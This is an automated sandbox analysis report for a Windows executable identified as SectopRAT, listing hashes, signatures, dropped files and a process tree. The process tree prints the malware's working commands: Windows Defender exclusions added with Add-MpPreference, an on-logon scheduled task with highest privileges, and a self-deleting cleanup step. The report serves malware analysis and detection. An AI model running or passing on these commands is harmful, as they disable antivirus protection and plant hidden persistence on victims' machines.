Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
06/04/2024, 20:40
Static task
static1
Behavioral task
behavioral1
Sample
e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe
Resource
win7-20240221-en
General
-
Target
e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe
-
Size
2.3MB
-
MD5
e33e3d1648bd9a98fc3875c1eb376889
-
SHA1
b684d4ea15479d2a09448d59d5aa6db5d666b012
-
SHA256
8be67974b71de6b2a70585cf81fe0d6a5cf67e9c03a667834e4a177e210ab500
-
SHA512
0948ffad6846adcf67700430d6dea1370f7948fa65fe3a17e391b4f2f49ce5cf262fec5226011d2951268142c3ee4f60ceb8d050052ed0a6f10e042d7cbb6153
-
SSDEEP
49152:A+mKqRWCKBA8N/7dtgQxmapsprT03R/zu7uEI:A7ReBxNLgkXp6w5zEuV
Malware Config
Signatures
-
SectopRAT payload 16 IoCs
resource yara_rule behavioral1/memory/2788-14-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat behavioral1/memory/2788-56-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat behavioral1/memory/2788-72-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat behavioral1/memory/2788-144-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat behavioral1/memory/2788-146-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat behavioral1/memory/2788-274-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat behavioral1/memory/2788-275-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat behavioral1/memory/2788-278-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat behavioral1/memory/2788-279-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat behavioral1/memory/2788-280-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat behavioral1/memory/2788-281-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat behavioral1/memory/2788-282-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat behavioral1/memory/2788-283-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat behavioral1/memory/2788-284-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat behavioral1/memory/2788-285-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat behavioral1/memory/2788-286-0x0000000000FD0000-0x00000000018F8000-memory.dmp family_sectoprat -
Executes dropped EXE 6 IoCs
pid Process 1968 etc.exe 2788 build.exe 1676 svchost32.exe 2244 services32.exe 1780 svchost32.exe 1688 sihost32.exe -
Loads dropped DLL 6 IoCs
pid Process 2512 e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe 2512 e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe 2312 cmd.exe 1676 svchost32.exe 1292 cmd.exe 1780 svchost32.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 15 raw.githubusercontent.com 16 raw.githubusercontent.com -
Drops file in System32 directory 7 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\Microsoft\Telemetry\sihost32.exe svchost32.exe File created C:\Windows\system32\services32.exe svchost32.exe File opened for modification C:\Windows\system32\services32.exe svchost32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid Process 2788 build.exe 2788 build.exe 2788 build.exe 2788 build.exe 2788 build.exe 2788 build.exe 2788 build.exe 2788 build.exe 2788 build.exe 2788 build.exe 2788 build.exe 2788 build.exe 2788 build.exe 2788 build.exe 2788 build.exe 2788 build.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2100 schtasks.exe 2524 schtasks.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 svchost32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e svchost32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e svchost32.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2580 powershell.exe 2436 powershell.exe 1700 powershell.exe 2616 powershell.exe 1676 svchost32.exe 788 powershell.exe 1996 powershell.exe 2136 powershell.exe 1652 powershell.exe 1780 svchost32.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 2580 powershell.exe Token: SeDebugPrivilege 2788 build.exe Token: SeDebugPrivilege 2436 powershell.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 2616 powershell.exe Token: SeDebugPrivilege 1676 svchost32.exe Token: SeDebugPrivilege 788 powershell.exe Token: SeDebugPrivilege 1996 powershell.exe Token: SeDebugPrivilege 2136 powershell.exe Token: SeDebugPrivilege 1652 powershell.exe Token: SeDebugPrivilege 1780 svchost32.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2788 build.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2512 wrote to memory of 1968 2512 e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe 28 PID 2512 wrote to memory of 1968 2512 e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe 28 PID 2512 wrote to memory of 1968 2512 e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe 28 PID 2512 wrote to memory of 1968 2512 e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe 28 PID 2512 wrote to memory of 2788 2512 e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe 29 PID 2512 wrote to memory of 2788 2512 e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe 29 PID 2512 wrote to memory of 2788 2512 e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe 29 PID 2512 wrote to memory of 2788 2512 e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe 29 PID 2512 wrote to memory of 2788 2512 e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe 29 PID 2512 wrote to memory of 2788 2512 e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe 29 PID 2512 wrote to memory of 2788 2512 e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe 29 PID 1968 wrote to memory of 2668 1968 etc.exe 31 PID 1968 wrote to memory of 2668 1968 etc.exe 31 PID 1968 wrote to memory of 2668 1968 etc.exe 31 PID 2668 wrote to memory of 2580 2668 cmd.exe 33 PID 2668 wrote to memory of 2580 2668 cmd.exe 33 PID 2668 wrote to memory of 2580 2668 cmd.exe 33 PID 2668 wrote to memory of 2436 2668 cmd.exe 34 PID 2668 wrote to memory of 2436 2668 cmd.exe 34 PID 2668 wrote to memory of 2436 2668 cmd.exe 34 PID 2668 wrote to memory of 1700 2668 cmd.exe 35 PID 2668 wrote to memory of 1700 2668 cmd.exe 35 PID 2668 wrote to memory of 1700 2668 cmd.exe 35 PID 2668 wrote to memory of 2616 2668 cmd.exe 36 PID 2668 wrote to memory of 2616 2668 cmd.exe 36 PID 2668 wrote to memory of 2616 2668 cmd.exe 36 PID 1968 wrote to memory of 2312 1968 etc.exe 37 PID 1968 wrote to memory of 2312 1968 etc.exe 37 PID 1968 wrote to memory of 2312 1968 etc.exe 37 PID 2312 wrote to memory of 1676 2312 cmd.exe 39 PID 2312 wrote to memory of 1676 2312 cmd.exe 39 PID 2312 wrote to memory of 1676 2312 cmd.exe 39 PID 1676 wrote to memory of 1216 1676 svchost32.exe 40 PID 1676 wrote to memory of 1216 1676 svchost32.exe 40 PID 1676 wrote to memory of 1216 1676 svchost32.exe 40 PID 1216 wrote to memory of 2100 1216 cmd.exe 42 PID 1216 wrote to memory of 2100 1216 cmd.exe 42 PID 1216 wrote to memory of 2100 1216 cmd.exe 42 PID 1676 wrote to memory of 2244 1676 svchost32.exe 43 PID 1676 wrote to memory of 2244 1676 svchost32.exe 43 PID 1676 wrote to memory of 2244 1676 svchost32.exe 43 PID 1676 wrote to memory of 2820 1676 svchost32.exe 44 PID 1676 wrote to memory of 2820 1676 svchost32.exe 44 PID 1676 wrote to memory of 2820 1676 svchost32.exe 44 PID 2820 wrote to memory of 2824 2820 cmd.exe 46 PID 2820 wrote to memory of 2824 2820 cmd.exe 46 PID 2820 wrote to memory of 2824 2820 cmd.exe 46 PID 2244 wrote to memory of 376 2244 services32.exe 47 PID 2244 wrote to memory of 376 2244 services32.exe 47 PID 2244 wrote to memory of 376 2244 services32.exe 47 PID 376 wrote to memory of 788 376 cmd.exe 49 PID 376 wrote to memory of 788 376 cmd.exe 49 PID 376 wrote to memory of 788 376 cmd.exe 49 PID 376 wrote to memory of 1996 376 cmd.exe 50 PID 376 wrote to memory of 1996 376 cmd.exe 50 PID 376 wrote to memory of 1996 376 cmd.exe 50 PID 376 wrote to memory of 2136 376 cmd.exe 51 PID 376 wrote to memory of 2136 376 cmd.exe 51 PID 376 wrote to memory of 2136 376 cmd.exe 51 PID 376 wrote to memory of 1652 376 cmd.exe 52 PID 376 wrote to memory of 1652 376 cmd.exe 52 PID 376 wrote to memory of 1652 376 cmd.exe 52 PID 2244 wrote to memory of 1292 2244 services32.exe 53 PID 2244 wrote to memory of 1292 2244 services32.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Users\Admin\AppData\Roaming\etc.exeC:\Users\Admin\AppData\Roaming\etc.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Roaming\etc.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Roaming\etc.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'6⤵
- Creates scheduled task(s)
PID:2100
-
-
-
C:\Windows\system32\services32.exe"C:\Windows\system32\services32.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit6⤵
- Suspicious use of WriteProcessMemory
PID:376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"6⤵
- Loads dropped DLL
PID:1292 -
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1780 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit8⤵PID:1320
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'9⤵
- Creates scheduled task(s)
PID:2524
-
-
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"8⤵
- Executes dropped EXE
PID:1688
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"8⤵PID:2276
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 39⤵PID:3028
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵PID:2824
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\build.exeC:\Users\Admin\AppData\Roaming\build.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2788
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5d247a95b20d72f12cec988c9aeb3236f
SHA1c0ee14281492a65178294991fbd2f8abef48d0a6
SHA256a8d549c14714305b39e8f804147baf672a97111867e6acd151edde5afee980d2
SHA512cd4108c7bf72841535eec221a9a122077dbfafd0e5acb38c6679b8cfe9048d9312aef589f367cc5d548276d7055061c0a630db3ea94058047069fe6653348c81
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
Filesize
134KB
MD5c0a0f69a8f0bd1078e29a87b690b1dd5
SHA1188e719ae4fb1a14f5cc41957c6b399ce63f4bae
SHA2562e95db0ce8987a00938465dfa31e470a70d01a44243b4dbfa843ba7072f23312
SHA5128b37d2c80d2ccdbcf8644b5e816b106de2715b30e0832c22790868ce8c03b0548828898436789743f73250d0a9f4df5da1dc364b0abef5ca8bd4402f87e09020
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5436bbc2cffd05b2a4046e620e19d4fd0
SHA17d5ac9ec077ae0fb61226ab8bb9b93194aaad539
SHA256bedc627b34ac4c81af3148dd92c1245702d27e8966d2473b5635fdede8895b1e
SHA5123746d3b0778c197f66e5916e6b8877b956ea22246e58d144c8860dbcb607f5c72e7bd9844464ea3fa8701fcd35697ce54004269d75cd948660fefecba1c809a6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f2643ab8f9ea5faf8adc0348c152b598
SHA188764c03b9f7f94bfab24c4a216f6ba92b8bc66d
SHA25620560f99229b090a82e52618cd95bdc12ddc56badedb5afb8e7a6086ce11fc60
SHA512f12626c3c4a586b1b3e3282e0cad1fe477b6719bd084ec19202385966d4760a62200e76186b7542051e3eb56c9ec19e814e01a6169857789da538871d49ae700
-
Filesize
272KB
MD55faf6449781d220959da0baf48d46f74
SHA1ca583a6bcf391458da10cf4a57353a4c986c5883
SHA256a61f251f1d025884d666a845710b903b566d3f2abc5a64509eba474b0101a672
SHA51298d4e333263d56bc0fda0c255c0ac61ac53df954c7c8511e0bf9611a0b9a82913e530b29e380d823e7ea522ae8626b8e10b79cb47e49fb82d138745bbcc9e379
-
Filesize
2.0MB
MD540ad1426ea2983757438d993fd878437
SHA12ebc872bb918fae9b54f8dc53468faf87c4a2e7e
SHA25683322d1873b5690241c4b3d29102d577ccf65d4307141d11a5300a16a38484e2
SHA5127bc43d65315c1c1b18a9b05b33a760478adda7a8eada0043931ebc0198ec35a396395f2ed4dafae5df0c9ece02b4b9b3b92c3a42876c98c04deec8c0646ee646
-
Filesize
59KB
MD505338b92b386f4757a399835b5807a28
SHA19d20f6c20d441b6848adaab170e27d1e317032e2
SHA256f9c2c1db5dedb4aa64002541a824d44e51469091f5f9d7a9da46bee35f2d8a6d
SHA512ea1c186c646f734e3f82e2921e50e34c4a8b1036e5fcc01d74f601930f7b09c7416bdc3bfc57d9b21295b1b1fad3ecef1216ff3b25f3fa43d9167c17131afc0f